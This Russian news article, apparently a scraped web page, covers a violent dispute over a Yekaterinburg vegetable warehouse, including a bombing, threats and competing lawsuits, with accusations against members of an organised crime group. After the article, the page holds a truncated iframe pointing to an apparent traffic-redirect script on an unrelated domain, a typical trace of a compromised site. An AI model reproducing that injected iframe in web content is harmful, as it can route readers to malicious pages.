«Подробности»: Война за помидоры

Конфликт вокруг продовольственной базы №4 в Екатеринбурге набирает обороты. В ход пошли взрывы и телефонные звонки с угрозами физического устранения. Нынешнее руководство, считает, что за всем этим стоят представители ОПС «Уралмаш» Игорь Антонов и Михаил Расов.
Уже не первый день директор ООО «Продовольственная база №4» Татьяна Русина снимает телефонную трубку с опаской: ей и ее родственникам постоянно угрожают. Вчера на территорию базы было подброшено взрывное устройство мощностью около 250 граммов тротила.
По счастливой случайности, сработал только запал и пострадал лишь охранник базы, на которого упала вылетевшая от взрывной волны дверь. Кроме него кассир базы отделалась сильным испугом.
Терпение руководителей крупнейшего поставщика овощей лопнуло. Вчера утром они собрали пресс-конференцию, где рассказали о «разборках» вокруг базы и обвинили во всех бедах ОПС «Уралмаш» и его представителей Михаила Расова и Игоря Антонова. Дело в том, что практически сразу после взрыва сотрудники вневедомственной охраны задержали возле базы охранника Игоря Антонова на машине того же Антонова. По предварительным данным, именно он бросил взрывное устройство в окно овощебазы.
При этом стоит отметить, что угрозами, взрывами и судами дело не ограничивается. Несколько дней назад некий Игорь Антонов во главе группы крепких парней приехал ночью на базу и, угрожая физической расправой непокорным, заставил водителей почти ста пятидесяти машин переехать на площадку Уралмашевского рынка, Игоря Антонова не остановило то, что эта площадка абсолютно не подходит ни для хранения овощей, ни, тем более, их продажи. Тем не менее все эти несколько дней торговля не прекращалась (учитывая то, что ни один продукт не прошел санитарной проверки), а жители окрестных домов продолжают жаловаться на большую загазованность прилегающей территории. Теперь никто не может поручиться, что в городе не будет очередной вспышки кишечных заболеваний — ведь многие горожане, стремясь сэкономить, покупают продукты именно на оптовых базах.
По словам Татьяны Русиной, с понедельника их противники выставили на подступах к складам лжемилицейские посты, которые разворачивали всех потенциальных оптовых покупателей на грузовиках и направляли их на Уралмашевский рынок.
При этом у «милиционеров» не было нагрудных знаков, обязательных для ношения во время дежурства, и ни один из них, по словам руководства ГИБДД не является их сотрудником, Противники Татьяны Русиной при этом ведут наступление не только противозаконными методами, но и через суды. Вскоре в Орджоникидзевском суде состоится слушание по очередному иску Михаила Расова, считающего себя единственным законным директором базы. Между тем на неоспоримо законных основаниях он пробыл на этом поприще лишь четыре дня. Правда, за это время он успел продать некоему предприятию «Димедрон-Пласт» большую часть недвижимости базы. Однако правомерность этих сделок будет рассматривать уже арбитражный суд.
Между тем в каждом районном суде Екатеринбурга в течение почти двух месяцев рассматриваются дела о правах директоров базы «по разные версиям». С переменным успехом верх берет то старый директор, Татьяна Русина, то защитник интересов ОПС «Уралмаш» Михаил Расов (именно в его интересах действовал Игорь Антонов). Естественно, ОПС «Уралмаш» приняло сторону Расова. Сегодня можно с полной уверенностью утверждать, что судебное заседание будет далеко не последним.
Вряд ли судья сможет удовлетворить обе стороны — ведь для этого нужно как минимум две овощебазы.
Комментарий
Дмитрий Карасюк, пресс-секретарь ОПС «Уралмаш»:
— Кто такой этот Игорь Антонов? Я вообще не знаю такого человека ОПС «Уралмаш» не существует. Взрыв, на мой взгляд, был подстроен Русиной в целях провокации.
Константин Копылов, начальник юридического отдела ООО «Продовольственная база N4»:
— Мы не намерены отступать. На сегодняшний день практически все суды подтвердили нашу правоту, и запугать нас уралмашевцам не удастся.
<iframe src="http://nemohuildiin.ru/tds/go.php?

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Октябрь 2020    »
ПнВтСрЧтПтСбВс
 1234
567891011
12131415161718
19202122232425
262728293031 

Контакты